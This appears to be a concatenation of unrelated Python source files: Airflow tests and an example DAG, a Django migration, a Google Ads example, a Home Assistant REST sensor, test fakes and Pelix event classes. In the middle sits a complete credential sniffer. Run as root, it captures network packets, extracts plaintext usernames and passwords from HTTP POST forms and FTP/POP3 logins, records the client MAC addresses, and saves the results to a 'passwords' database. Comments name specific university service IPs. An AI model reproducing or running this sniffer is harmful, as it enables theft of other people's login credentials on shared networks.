self.hook = ZendeskHook(zendesk_conn_id=self.conn_id)
def test_hook_init_and_get_conn(self):
# Verify config of zenpy APIs
zenpy_client = self.hook.get_conn()
assert zenpy_client.users.subdomain == 'yoursubdomain'
assert zenpy_client.users.domain == 'zendesk.com'
assert zenpy_client.users.session.auth == ('user@gmail.com', 'eb243592-faa2-4ba2-a551q-1afdf565c889')
assert not zenpy_client.cache.disabled
assert self.hook._ZendeskHook__url == 'https://yoursubdomain.zendesk.com'
def test_get_ticket(self):
zenpy_client = self.hook.get_conn()
with patch.object(zenpy_client, 'tickets') as tickets_mock:
self.hook.get_ticket(ticket_id=1)
tickets_mock.assert_called_once_with(id=1)
def test_search_tickets(self):
zenpy_client = self.hook.get_conn()
with patch.object(zenpy_client, 'search') as search_mock:
self.hook.search_tickets(status='open', sort_order='desc')
search_mock.assert_called_once_with(type='ticket', status='open', sort_order='desc')
def test_create_tickets(self):
zenpy_client = self.hook.get_conn()
ticket = Ticket(subject="This is a test ticket to create")
        with patch.object(zenpy_client.tickets, 'create') as create_mock:
            self.hook.create_tickets(ticket, extra_parameter="extra_parameter")
            create_mock.assert_called_once_with(ticket, extra_parameter="extra_parameter")
def test_update_tickets(self):
zenpy_client = self.hook.get_conn()
ticket = Ticket(subject="This is a test ticket to update")
        with patch.object(zenpy_client.tickets, 'update') as update_mock:
            self.hook.update_tickets(ticket, extra_parameter="extra_parameter")
            update_mock.assert_called_once_with(ticket, extra_parameter="extra_parameter")
def test_delete_tickets(self):
zenpy_client = self.hook.get_conn()
ticket = Ticket(subject="This is a test ticket to delete")
        with patch.object(zenpy_client.tickets, 'delete') as delete_mock:
            self.hook.delete_tickets(ticket, extra_parameter="extra_parameter")
            delete_mock.assert_called_once_with(ticket, extra_parameter="extra_parameter")
|
import unittest
import mock
from airflow.exceptions import AirflowException
from airflow.providers.amazon.aws.hooks.sagemaker import SageMakerHook
from airflow.providers.amazon.aws.sensors.sagemaker_endpoint import SageMakerEndpointSensor
DESCRIBE_ENDPOINT_CREATING_RESPONSE = {
'EndpointStatus': 'Creating',
'ResponseMetadata': {
'HTTPStatusCode': 200,
}
}
DESCRIBE_ENDPOINT_INSERVICE_RESPONSE = {
'EndpointStatus': 'InService',
'ResponseMetadata': {
'HTTPStatusCode': 200,
}
}
DESCRIBE_ENDPOINT_FAILED_RESPONSE = {
'EndpointStatus': 'Failed',
'ResponseMetadata': {
'HTTPStatusCode': 200,
},
'FailureReason': 'Unknown'
}
DESCRIBE_ENDPOINT_UPDATING_RESPONSE = {
'EndpointStatus': 'Updating',
'ResponseMetadata': {
'HTTPStatusCode': 200,
}
}
class TestSageMakerEndpointSensor(unittest.TestCase):
@mock.patch.object(SageMakerHook, 'get_conn')
@mock.patch.object(SageMakerHook, 'describe_endpoint')
def test_sensor_with_failure(self, mock_describe, mock_get_conn):
mock_describe.side_effect = [DESCRIBE_ENDPOINT_FAILED_RESPONSE]
sensor = SageMakerEndpointSensor(
task_id='test_task',
poke_interval=1,
aws_conn_id='aws_test',
endpoint_name='test_job_name'
)
self.assertRaises(AirflowException, sensor.execute, None)
mock_describe.assert_called_once_with('test_job_name')
@mock.patch.object(SageMakerHook, 'get_conn')
@mock.patch.object(SageMakerHook, '__init__')
@mock.patch.object(SageMakerHook, 'describe_endpoint')
def test_sensor(self, mock_describe, hook_init, mock_get_conn):
hook_init.return_value = None
mock_describe.side_effect = [
DESCRIBE_ENDPOINT_CREATING_RESPONSE,
DESCRIBE_ENDPOINT_UPDATING_RESPONSE,
DESCRIBE_ENDPOINT_INSERVICE_RESPONSE
]
sensor = SageMakerEndpointSensor(
task_id='test_task',
poke_interval=1,
aws_conn_id='aws_test',
endpoint_name='test_job_name'
)
sensor.execute(None)
        # make sure describe_endpoint was called 3 times (polling stops once InService)
self.assertEqual(mock_describe.call_count, 3)
# make sure the hook was initialized with the specific params
calls = [
mock.call(aws_conn_id='aws_test'),
mock.call(aws_conn_id='aws_test'),
mock.call(aws_conn_id='aws_test')
]
hook_init.assert_has_calls(calls)
if __name__ == '__main__':
unittest.main()
|
"""
Example Airflow DAG for Google Cloud Memorystore service.
"""
import os
from urllib.parse import urlparse
from google.cloud.redis_v1.gapic.enums import FailoverInstanceRequest, Instance
from airflow import models
from airflow.operators.bash import BashOperator
from airflow.providers.google.cloud.operators.cloud_memorystore import (
CloudMemorystoreCreateInstanceAndImportOperator, CloudMemorystoreCreateInstanceOperator,
CloudMemorystoreDeleteInstanceOperator, CloudMemorystoreExportAndDeleteInstanceOperator,
CloudMemorystoreExportInstanceOperator, CloudMemorystoreFailoverInstanceOperator,
CloudMemorystoreGetInstanceOperator, CloudMemorystoreImportOperator,
CloudMemorystoreListInstancesOperator, CloudMemorystoreScaleInstanceOperator,
CloudMemorystoreUpdateInstanceOperator,
)
from airflow.providers.google.cloud.operators.gcs import GCSBucketCreateAclEntryOperator
from airflow.utils import dates
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "example-project")
INSTANCE_NAME = os.environ.get("GCP_MEMORYSTORE_INSTANCE_NAME", "test-memorystore")
INSTANCE_NAME_2 = os.environ.get("GCP_MEMORYSTORE_INSTANCE_NAME2", "test-memorystore-2")
INSTANCE_NAME_3 = os.environ.get("GCP_MEMORYSTORE_INSTANCE_NAME3", "test-memorystore-3")
EXPORT_GCS_URL = os.environ.get("GCP_MEMORYSTORE_EXPORT_GCS_URL", "gs://test-memorystore/my-export.rdb")
EXPORT_GCS_URL_PARTS = urlparse(EXPORT_GCS_URL)
BUCKET_NAME = EXPORT_GCS_URL_PARTS.netloc
FIRST_INSTANCE = {"tier": Instance.Tier.BASIC, "memory_size_gb": 1}
SECOND_INSTANCE = {"tier": Instance.Tier.STANDARD_HA, "memory_size_gb": 3}
default_args = {"start_date": dates.days_ago(1)}
with models.DAG(
"gcp_cloud_memorystore",
default_args=default_args,
schedule_interval=None, # Override to match your needs
tags=['example'],
) as dag:
# [START howto_operator_create_instance]
create_instance = CloudMemorystoreCreateInstanceOperator(
task_id="create-instance",
location="europe-north1",
instance_id=INSTANCE_NAME,
instance=FIRST_INSTANCE,
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_create_instance]
# [START howto_operator_create_instance_result]
create_instance_result = BashOperator(
task_id="create-instance-result",
bash_command="echo \"{{ task_instance.xcom_pull('create-instance') }}\"",
)
# [END howto_operator_create_instance_result]
create_instance_2 = CloudMemorystoreCreateInstanceOperator(
task_id="create-instance-2",
location="europe-north1",
instance_id=INSTANCE_NAME_2,
instance=SECOND_INSTANCE,
project_id=GCP_PROJECT_ID,
)
# [START howto_operator_get_instance]
get_instance = CloudMemorystoreGetInstanceOperator(
task_id="get-instance", location="europe-north1", instance=INSTANCE_NAME, project_id=GCP_PROJECT_ID
)
# [END howto_operator_get_instance]
# [START howto_operator_get_instance_result]
get_instance_result = BashOperator(
task_id="get-instance-result", bash_command="echo \"{{ task_instance.xcom_pull('get-instance') }}\""
)
# [END howto_operator_get_instance_result]
# [START howto_operator_failover_instance]
failover_instance = CloudMemorystoreFailoverInstanceOperator(
task_id="failover-instance",
location="europe-north1",
instance=INSTANCE_NAME_2,
data_protection_mode=FailoverInstanceRequest.DataProtectionMode.LIMITED_DATA_LOSS,
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_failover_instance]
# [START howto_operator_list_instances]
list_instances = CloudMemorystoreListInstancesOperator(
task_id="list-instances", location="-", page_size=100, project_id=GCP_PROJECT_ID
)
# [END howto_operator_list_instances]
# [START howto_operator_list_instances_result]
    list_instances_result = BashOperator(
        task_id="list-instances-result",
        bash_command="echo \"{{ task_instance.xcom_pull('list-instances') }}\"",
    )
# [END howto_operator_list_instances_result]
# [START howto_operator_update_instance]
update_instance = CloudMemorystoreUpdateInstanceOperator(
task_id="update-instance",
location="europe-north1",
instance_id=INSTANCE_NAME,
project_id=GCP_PROJECT_ID,
update_mask={"paths": ["memory_size_gb"]},
instance={"memory_size_gb": 2},
)
# [END howto_operator_update_instance]
# [START howto_operator_set_acl_permission]
set_acl_permission = GCSBucketCreateAclEntryOperator(
task_id="gcs-set-acl-permission",
bucket=BUCKET_NAME,
entity="user-{{ task_instance.xcom_pull('get-instance')['persistenceIamIdentity']"
".split(':', 2)[1] }}",
role="OWNER",
)
# [END howto_operator_set_acl_permission]
# [START howto_operator_export_instance]
export_instance = CloudMemorystoreExportInstanceOperator(
task_id="export-instance",
location="europe-north1",
instance=INSTANCE_NAME,
output_config={"gcs_destination": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_export_instance]
# [START howto_operator_import_instance]
import_instance = CloudMemorystoreImportOperator(
task_id="import-instance",
location="europe-north1",
instance=INSTANCE_NAME_2,
input_config={"gcs_source": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_import_instance]
# [START howto_operator_delete_instance]
delete_instance = CloudMemorystoreDeleteInstanceOperator(
task_id="delete-instance", location="europe-north1", instance=INSTANCE_NAME, project_id=GCP_PROJECT_ID
)
# [END howto_operator_delete_instance]
delete_instance_2 = CloudMemorystoreDeleteInstanceOperator(
task_id="delete-instance-2",
location="europe-north1",
instance=INSTANCE_NAME_2,
project_id=GCP_PROJECT_ID,
)
    # [START howto_operator_create_instance_and_import]
create_instance_and_import = CloudMemorystoreCreateInstanceAndImportOperator(
task_id="create-instance-and-import",
location="europe-north1",
instance_id=INSTANCE_NAME_3,
instance=FIRST_INSTANCE,
input_config={"gcs_source": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
    # [END howto_operator_create_instance_and_import]
# [START howto_operator_scale_instance]
scale_instance = CloudMemorystoreScaleInstanceOperator(
task_id="scale-instance",
location="europe-north1",
instance_id=INSTANCE_NAME_3,
project_id=GCP_PROJECT_ID,
memory_size_gb=3,
)
# [END howto_operator_scale_instance]
    # [START howto_operator_export_and_delete_instance]
export_and_delete_instance = CloudMemorystoreExportAndDeleteInstanceOperator(
task_id="export-and-delete-instance",
location="europe-north1",
instance=INSTANCE_NAME_3,
output_config={"gcs_destination": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
    # [END howto_operator_export_and_delete_instance]
create_instance >> get_instance >> get_instance_result
create_instance >> update_instance
create_instance >> create_instance_result
create_instance >> export_instance
create_instance_2 >> import_instance
create_instance >> list_instances >> list_instances_result
list_instances >> delete_instance
update_instance >> delete_instance
get_instance >> set_acl_permission >> export_instance
export_instance >> import_instance
export_instance >> delete_instance
import_instance >> delete_instance_2
create_instance_2 >> failover_instance
failover_instance >> delete_instance_2
export_instance >> create_instance_and_import >> scale_instance >> export_and_delete_instance
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("zerver", "0342_realm_demo_organization_scheduled_deletion_date"),
]
operations = [
migrations.AlterIndexTogether(
name="useractivityinterval",
index_together={("user_profile", "end")},
),
]
|
import subprocess
from utils import *
@all_files_in_dir('util_clk_reset')
@all_available_simulators()
def test_mock_uvm_report(datafiles, simulator):
with datafiles.as_cwd():
subprocess.check_call(['runSVUnit', '-s', simulator])
expect_testrunner_pass('run.log')
|
"""This code example gets all premium rates belonging to a specific rate card.
To create premium rates, run create_premium_rates.py.
"""
from googleads import dfp
RATE_CARD_ID = 'INSERT_RATE_CARD_ID_HERE'
def main(client, rate_card_id):
# Initialize appropriate service.
premium_rate_service = client.GetService('PremiumRateService',
version='v201505')
  # Create a statement to select premium rates belonging to the rate card.
values = [{
'key': 'rateCardId',
'value': {
'xsi_type': 'NumberValue',
'value': rate_card_id
}
}]
query = 'WHERE rateCardId = :rateCardId ORDER BY id ASC'
statement = dfp.FilterStatement(query, values)
# Get premium rates by statement.
while True:
response = premium_rate_service.getPremiumRatesByStatement(
statement.ToStatement())
if 'results' in response:
# Display results.
for premium_rate in response['results']:
        print ('Premium rate with ID \'%s\' of type \'%s\' assigned to '
               'rate card with ID \'%s\' was found.\n' % (
premium_rate['id'],
dfp.DfpClassType(premium_rate['premiumFeature']),
premium_rate['rateCardId']))
statement.offset += dfp.SUGGESTED_PAGE_LIMIT
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, RATE_CARD_ID)
|
import dpkt
import pcap
import re
import socket
import urlparse
import binascii
import signal
import sys
import os
import argparse
import rethinkdb as r
from rethinkdb.errors import RqlRuntimeError, RqlDriverError
from pprint import pprint
from utils import add_colons_to_mac
RDB_HOST = os.environ.get('RDB_HOST') or 'localhost'
RDB_PORT = os.environ.get('RDB_PORT') or 28015
PWD_DB = 'passwords'
APP = {80: 'HTTP', 23: 'TELNET', 21: 'FTP', 110: 'POP3'}
def dbSetup():
connection = r.connect(host=RDB_HOST, port=RDB_PORT)
try:
r.db_create(PWD_DB).run(connection)
r.db(PWD_DB).table_create('pwd_table').run(connection)
r.db(PWD_DB).table_create('status_table').run(connection)
# Initial status value
r.db(PWD_DB).table('status_table').insert([{"status": "ON"}]).run(connection)
print '[-] Database setup completed. Now run the sniffer without --setup.'
except RqlRuntimeError:
print '[-] Sniffer database already exists. Run the sniffer without --setup.'
finally:
connection.close()
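# Typical bootstrap, per the status messages printed above (script name is
# hypothetical; only the --setup flag is evidenced by this file):
#
#     $ python sniffer.py --setup   # create the RethinkDB tables once
#     $ python sniffer.py           # then start sniffing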
class Sniffer(object):
def __init__(self, *args, **kwargs):
try:
self.rdb_conn = r.connect(host=RDB_HOST, port=RDB_PORT, db=PWD_DB)
except RqlDriverError:
sys.exit("[!] No database connection could be established.")
cursor = r.table("status_table").run(self.rdb_conn)
for document in cursor:
self.status_id = document.get('id')
# Status ON
r.table('status_table').get(self.status_id).update({"status": "ON"}).run(self.rdb_conn)
pattern = 'tcp and dst port 80 or dst port 21'
# pattern = 'tcp and dst port 80 or dst port 21 or dst port 110'
self.pc = pcap.pcap(kwargs['interface'])
self.pc.setfilter(pattern)
self.all_user_info = {}
self.devices_mac = {}
self.info_counter = 0
def _is_host(self, content):
regex = re.compile('Host: (.*)')
return content is not None and regex.search(content)
def _is_pwd(self, content):
        regex = re.compile('(.*)password=(.*)')
return content is not None and regex.search(content)
def _is_pwd_with_txt(self, content):
        regex = re.compile('(.*)txtPwd=(.*)')
return content is not None and regex.search(content)
def _pick_ftp_info(self, data, client, server, dport, eth_src):
self.devices_mac.setdefault(add_colons_to_mac(eth_src), {})
self.devices_mac[add_colons_to_mac(eth_src)]['client'] = client
self.devices_mac[add_colons_to_mac(eth_src)]['server'] = server
self.devices_mac[add_colons_to_mac(eth_src)]['app'] = APP.get(dport)
self.devices_mac[add_colons_to_mac(eth_src)]['mac'] = (
add_colons_to_mac(eth_src))
if data.get('USER'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'login': data.get('USER')})
if data.get('PASS'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'password': data.get('PASS')})
device_info = self.devices_mac[add_colons_to_mac(eth_src)]
        if 'login' in device_info and 'password' in device_info:
            print "[-] Captured new FTP credentials:"
pprint(self.devices_mac[add_colons_to_mac(eth_src)])
r.table('pwd_table').insert([self.devices_mac[add_colons_to_mac(eth_src)]]).run(self.rdb_conn)
# When push to firebase delete it
del self.devices_mac[add_colons_to_mac(eth_src)]
def _pick_http_info(self, data, client, server, dport, eth_src):
self.info_counter += 1
self.all_user_info[self.info_counter] = (
{'client': client, 'server': server,
'app': APP.get(dport),
'mac': add_colons_to_mac(binascii.hexlify(eth_src))}
)
if data.get('account'):
self.all_user_info[self.info_counter].update(
{'login': data.get('account')[0]})
elif data.get('username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('username')[0]})
elif data.get('identification'):
self.all_user_info[self.info_counter].update({
'login': data.get('identification')[0]})
elif data.get('id'):
self.all_user_info[self.info_counter].update(
{'login': data.get('id')[0]})
elif data.get('os_username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('os_username')[0]})
elif data.get('txtAccount'):
self.all_user_info[self.info_counter].update(
{'login': data.get('txtAccount')[0]})
elif data.get('email'):
self.all_user_info[self.info_counter].update(
{'login': data.get('email')[0]})
else:
self.all_user_info[self.info_counter].update({'login': None})
if data.get('password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('password')[0]})
elif data.get('os_password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('os_password')[0]})
elif data.get('txtPwd'):
self.all_user_info[self.info_counter].update(
{'password': data.get('txtPwd')[0]})
else:
self.all_user_info[self.info_counter].update({'password': None})
print "[-] HTTP New Password get:"
pprint(self.all_user_info[self.info_counter])
r.table('pwd_table').insert([self.all_user_info[self.info_counter]]).run(self.rdb_conn)
def _get_ftp_pop_payload(self, eth_pkt, ip_pkt, tcp_pkt):
if 'USER' in tcp_pkt.data:
regex = re.compile('USER (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'PASS' in tcp_pkt.data:
regex = re.compile('PASS (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'user' in tcp_pkt.data:
regex = re.compile('user (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'pass' in tcp_pkt.data:
regex = re.compile('pass (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
else:
return
def _get_http_payload(self, eth_pkt, ip_pkt, tcp_pkt):
try:
http_req = dpkt.http.Request(tcp_pkt.data)
if http_req.method == 'POST':
# This is POST method
pass
except dpkt.dpkt.UnpackError:
pass
if 'POST' in tcp_pkt.data:
# print 'POST', tcp.data
if 'password=' in tcp_pkt.data:
# print 'In POST packet password', tcp.data
pwd_obj = self._is_pwd(tcp_pkt.data)
if pwd_obj:
# print 'query string found:', pwd_obj.group(0)
qs_d = urlparse.parse_qs(pwd_obj.group(0))
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'password=' in tcp_pkt.data:
# print 'password', tcp.data
qs_d = urlparse.parse_qs(tcp_pkt.data)
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'txtPwd=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'email=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
else:
return
# Moocs dst IP 140.114.60.144
# Kits dst IP 74.125.204.121
# iLMS dst IP 140.114.69.137
def loop(self):
# result = {'status': 'ON'}
# cursor = r.table("status_table").get(self.status_id).changes().run(self.rdb_conn)
# print status_result
# for document in cursor:
# print document.get('status')
while True:
result = r.table("status_table").get(self.status_id).run(self.rdb_conn)
# pdb.set_trace()
if result.get('status') == 'ON':
try:
for ts, buf in self.pc:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
tcp = ip.data
if len(tcp.data) > 0:
# print 'Packet in dst port number', tcp.dport
# make sure the pattern is correct
if tcp.dport == 80:
self._get_http_payload(eth, ip, tcp)
elif tcp.dport == 21 or tcp.dport == 110:
self._get_ftp_pop_payload(eth, ip, tcp)
else:
pass
except KeyboardInterrupt:
nrecv, ndrop, nifdrop = self.pc.stats()
print '\n[-] %d packets received by filter' % nrecv
print '[-] %d packets dropped by kernel' % ndrop
break
except (NameError, TypeError):
# print "No packet"
continue
else:
signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
print "[-] I can not see packets."
continue
def __del__(self):
# Status OFF
r.table('status_table').get(self.status_id).update({"status": "OFF"}).run(self.rdb_conn)
result = r.table("status_table").get(self.status_id).run(self.rdb_conn)
print '[*] Sniffer is %s' % result['status']
# pdb.set_trace()
try:
self.rdb_conn.close()
except AttributeError:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run the Sniffer')
parser.add_argument('--setup', dest='run_setup', action='store_true')
parser.add_argument("-s", '--interface',
help='Specify an interface',
default='eth0')
args = parser.parse_args()
if args.run_setup:
dbSetup()
else:
if os.geteuid():
sys.exit('[-] Please run as root')
s = Sniffer(interface=args.interface)
print '[*] Using interface:', s.pc.name
s.loop()
|
"""Support for RESTful binary sensors."""
import httpx
import voluptuous as vol
from homeassistant.components.binary_sensor import (
DEVICE_CLASSES_SCHEMA,
PLATFORM_SCHEMA,
BinarySensorEntity,
)
from homeassistant.const import (
CONF_AUTHENTICATION,
CONF_DEVICE_CLASS,
CONF_FORCE_UPDATE,
CONF_HEADERS,
CONF_METHOD,
CONF_NAME,
CONF_PARAMS,
CONF_PASSWORD,
CONF_PAYLOAD,
CONF_RESOURCE,
CONF_RESOURCE_TEMPLATE,
CONF_TIMEOUT,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
CONF_VERIFY_SSL,
HTTP_BASIC_AUTHENTICATION,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.exceptions import PlatformNotReady
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.reload import async_setup_reload_service
from . import DOMAIN, PLATFORMS
from .data import DEFAULT_TIMEOUT, RestData
DEFAULT_METHOD = "GET"
DEFAULT_NAME = "REST Binary Sensor"
DEFAULT_VERIFY_SSL = True
DEFAULT_FORCE_UPDATE = False
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Exclusive(CONF_RESOURCE, CONF_RESOURCE): cv.url,
vol.Exclusive(CONF_RESOURCE_TEMPLATE, CONF_RESOURCE): cv.template,
vol.Optional(CONF_AUTHENTICATION): vol.In(
[HTTP_BASIC_AUTHENTICATION, HTTP_DIGEST_AUTHENTICATION]
),
vol.Optional(CONF_HEADERS): {cv.string: cv.string},
vol.Optional(CONF_PARAMS): {cv.string: cv.string},
vol.Optional(CONF_METHOD, default=DEFAULT_METHOD): vol.In(["POST", "GET"]),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PAYLOAD): cv.string,
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
vol.Optional(CONF_FORCE_UPDATE, default=DEFAULT_FORCE_UPDATE): cv.boolean,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
}
)
PLATFORM_SCHEMA = vol.All(
cv.has_at_least_one_key(CONF_RESOURCE, CONF_RESOURCE_TEMPLATE), PLATFORM_SCHEMA
)
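# For reference, a minimal YAML configuration accepted by the schema above
# could look like this (illustrative values only):
#
#   binary_sensor:
#     - platform: rest
#       resource: http://192.168.1.10/status
#       method: GET
#       value_template: "{{ value_json.is_open }}"
#       device_class: opening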
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the REST binary sensor."""
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
name = config.get(CONF_NAME)
resource = config.get(CONF_RESOURCE)
resource_template = config.get(CONF_RESOURCE_TEMPLATE)
method = config.get(CONF_METHOD)
payload = config.get(CONF_PAYLOAD)
verify_ssl = config.get(CONF_VERIFY_SSL)
timeout = config.get(CONF_TIMEOUT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
headers = config.get(CONF_HEADERS)
params = config.get(CONF_PARAMS)
device_class = config.get(CONF_DEVICE_CLASS)
value_template = config.get(CONF_VALUE_TEMPLATE)
force_update = config.get(CONF_FORCE_UPDATE)
if resource_template is not None:
resource_template.hass = hass
resource = resource_template.async_render(parse_result=False)
if value_template is not None:
value_template.hass = hass
if username and password:
if config.get(CONF_AUTHENTICATION) == HTTP_DIGEST_AUTHENTICATION:
auth = httpx.DigestAuth(username, password)
else:
auth = (username, password)
else:
auth = None
rest = RestData(
hass, method, resource, auth, headers, params, payload, verify_ssl, timeout
)
await rest.async_update()
if rest.data is None:
raise PlatformNotReady
async_add_entities(
[
RestBinarySensor(
hass,
rest,
name,
device_class,
value_template,
force_update,
resource_template,
)
],
)
class RestBinarySensor(BinarySensorEntity):
"""Representation of a REST binary sensor."""
def __init__(
self,
hass,
rest,
name,
device_class,
value_template,
force_update,
resource_template,
):
"""Initialize a REST binary sensor."""
self._hass = hass
self.rest = rest
self._name = name
self._device_class = device_class
self._state = False
self._previous_data = None
self._value_template = value_template
self._force_update = force_update
self._resource_template = resource_template
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def device_class(self):
"""Return the class of this sensor."""
return self._device_class
@property
def available(self):
"""Return the availability of this sensor."""
return self.rest.data is not None
@property
def is_on(self):
"""Return true if the binary sensor is on."""
if self.rest.data is None:
return False
response = self.rest.data
if self._value_template is not None:
response = self._value_template.async_render_with_possible_json_value(
self.rest.data, False
)
try:
return bool(int(response))
except ValueError:
return {"true": True, "on": True, "open": True, "yes": True}.get(
response.lower(), False
)
@property
def force_update(self):
"""Force update."""
return self._force_update
async def async_update(self):
"""Get the latest data from REST API and updates the state."""
if self._resource_template is not None:
self.rest.set_url(self._resource_template.async_render(parse_result=False))
await self.rest.async_update()
|
import mock
from manila.tests import fake_compute
class FakeServiceInstanceManager(object):
def __init__(self, *args, **kwargs):
self.db = mock.Mock()
self._helpers = {
'CIFS': mock.Mock(),
'NFS': mock.Mock(),
}
self.share_networks_locks = {}
self.share_networks_servers = {}
self.fake_server = fake_compute.FakeServer()
self.service_instance_name_template = 'manila_fake_service_instance-%s'
def get_service_instance(self, context, share_network_id, create=True):
return self.fake_server
def _create_service_instance(self, context, instance_name,
share_network_id, old_server_ip):
return self.fake_server
def _delete_server(self, context, server):
pass
def _get_service_instance_name(self, share_network_id):
return self.service_instance_name_template % share_network_id
|
from __future__ import print_function
import sys, os
sys.path.insert(1, os.path.join("..","..",".."))
import h2o
from tests import pyunit_utils
from h2o.estimators.deepwater import H2ODeepWaterEstimator
def deepwater_multi():
if not H2ODeepWaterEstimator.available(): return
frame = h2o.import_file(pyunit_utils.locate("bigdata/laptop/deepwater/imagenet/cat_dog_mouse.csv"))
print(frame.head(5))
model = H2ODeepWaterEstimator(epochs=50, learning_rate=1e-3)
model.train(x=[0],y=1, training_frame=frame)
model.show()
error = model.model_performance(train=True).mean_per_class_error()
assert error < 0.1, "mean classification error is too high : " + str(error)
if __name__ == "__main__":
pyunit_utils.standalone_test(deepwater_multi)
else:
deepwater_multi()
|
"""
Event beans for Pelix.
:author: Thomas Calmant
:copyright: Copyright 2014, isandlaTech
:license: Apache License 2.0
:version: 0.5.8
:status: Beta
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__version_info__ = (0, 5, 8)
__version__ = ".".join(str(x) for x in __version_info__)
__docformat__ = "restructuredtext en"
from pelix.utilities import Deprecated
class BundleEvent(object):
"""
Represents a bundle event
"""
INSTALLED = 1
"""The bundle has been installed."""
STARTED = 2
"""The bundle has been started."""
STARTING = 128
"""The bundle is about to be activated."""
STOPPED = 4
"""
The bundle has been stopped. All of its services have been unregistered.
"""
STOPPING = 256
"""The bundle is about to deactivated."""
STOPPING_PRECLEAN = 512
"""
The bundle has been deactivated, but some of its services may still remain.
"""
UNINSTALLED = 16
"""The bundle has been uninstalled."""
UPDATED = 8
"""The bundle has been updated. (called after STARTED) """
UPDATE_BEGIN = 32
""" The bundle will be updated (called before STOPPING) """
UPDATE_FAILED = 64
""" The bundle update has failed. The bundle might be in RESOLVED state """
def __init__(self, kind, bundle):
"""
Sets up the event
"""
self.__kind = kind
self.__bundle = bundle
def __str__(self):
"""
String representation
"""
return "BundleEvent({0}, {1})".format(self.__kind, self.__bundle)
def get_bundle(self):
"""
Retrieves the modified bundle
"""
return self.__bundle
def get_kind(self):
"""
Retrieves the kind of event
"""
return self.__kind
class ServiceEvent(object):
"""
Represents a service event
"""
REGISTERED = 1
""" This service has been registered """
MODIFIED = 2
""" The properties of a registered service have been modified """
UNREGISTERING = 4
""" This service is in the process of being unregistered """
MODIFIED_ENDMATCH = 8
"""
The properties of a registered service have been modified and the new
properties no longer match the listener's filter
"""
def __init__(self, kind, reference, previous_properties=None):
"""
Sets up the event
:param kind: Kind of event
:param reference: Reference to the modified service
